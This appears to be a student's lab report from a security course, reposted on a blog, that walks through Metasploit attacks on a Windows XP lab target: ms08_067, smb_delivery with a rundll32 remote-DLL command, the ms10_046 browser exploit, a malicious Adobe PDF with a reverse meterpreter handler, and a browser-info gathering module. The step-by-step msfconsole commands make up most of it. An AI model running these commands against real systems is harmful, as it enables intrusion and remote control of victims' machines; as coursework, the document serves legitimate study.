20164301 Exp5 MSF基础应用

Exp5 MSF基础应用


1. 实践内容

  1.1一个主动攻击实践,如ms08_067,smb_delivery(唯一)

  1.2 一个针对浏览器的攻击,如ms10_046;

  1.3 一个针对客户端的攻击,如Adobe;

  1.4 成功应用任何一个辅助模块。gather/browser_info(唯一)


 2.报告内容

一个主动攻击实践,如ms08_067,smb_delivery

(1)ms08_067

攻击机:Linux

靶机:Windows XP sp3

1.进入到/usr/share/metasploit-framework/modules/exploits/windows/smb路径下,查看可利用的漏洞

 

 Linux的IP地址192.168.132.130

 靶机IP地址192.168.132.131

 

2.

msf > use exploit/windows/smb/ms08_067_netapi//使用ms08_067漏洞

msf exploit(ms08_067_netapi) > show payloads//显示回连攻击载荷

msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp 

msf exploit(ms08_067_netapi) > set LHOST 192.168.132.130 //攻击机ip

msf exploit(ms08_067_netapi) > set LPORT 4301 //攻击端口

msf exploit(ms08_067_netapi) > set RHOST 172.30.4.19 //靶机ip

msf exploit(ms08_067_netapi) > set target 0 //自动选择目标系统类型

msf exploit(ms08_067_netapi) > exploit //攻击

 

 3.攻击成功,用systeminfo命令检测

 

(2)smb_delivery(唯一)

 1.msf > use exploit/windows/smb/smb_delivery //使用smb_delivery漏洞

 2.show options查看要设置的内容

 

 3.通过Windows计算机中的rundll32.exe运行恶意代码以获取meterpreter会话

 4.输入生成指令rundll32.exe \\192.168.132.130\Rrzqb\test.dll,0

 

 5.攻击成功,获得meterpreter会话

 

 

 一个针对浏览器的攻击,如ms10_046

 1.使用ms10_046,查看需要设置的参数,SRVHOST填本地监听主机的IP地址,LHOST填监听的IP地址,攻击

生成一个URL:http://192.168.132.130:80/,在靶机的IE浏览器上使用该url进行访问,攻击成功

 2.输入sessions查看连接

 

 3.输入sessions -i 1,实现meterpreter会话

 

 

 

 一个针对客户端的攻击,如Adobe

 1.

在攻击机kali输入msfconsole进入控制台,依次输入
msf > use windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.132.130
msf exploit(adobe_cooltype_sing) > set LPORT 4301 
msf exploit(adobe_cooltype_sing) > set FILENAME c.pdf 
msf exploit(adobe_cooltype_sing) > exploit //攻击
成功生成c.pdf,传输到靶机

 2.

退出当前模块,进入监听模块,输入以下命令:

msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp 
msf exploit(handler) > set LHOST 192.168.132.130 
msf exploit(handler) > set LPORT 4301 
msf exploit(handler) > exploit

在靶机上点击传送的c.pdf

发现攻击成功,实现meterpreter会话

 

 

 

 

 

成功应用任何一个辅助模块。gather/browser_info(唯一)

 1.使用gather/browser_info模块

输入show options命令,发现该模块是通过访问网站来搜集浏览器信息

 

 2.按show options内容设置好参数后,生成URL:http://192.168.132.130:8080/SuLgGmvDz

3.在靶机浏览器上输入该地址

 4.成功查找到信息

 

 

 


 3.1.基础问题回答

   用自己的话解释什么是exploit,payload,encode.

exploit,漏洞利用;payload,攻击载荷,系统被攻击后执行的操作;encode,对后门程序进行编码处理,实现免杀

  3.2.实践总结与体会

 这次实验很简单,但做了很长时间。因为对msf应用和指令的不熟悉,尝试了很多攻击都失败了,但也让我对msf基础攻击的

具体操作方法有了进一步的认识。

 

 

猜你喜欢

转载自www.cnblogs.com/chm666/p/10720000.html
0条评论
添加一条新回复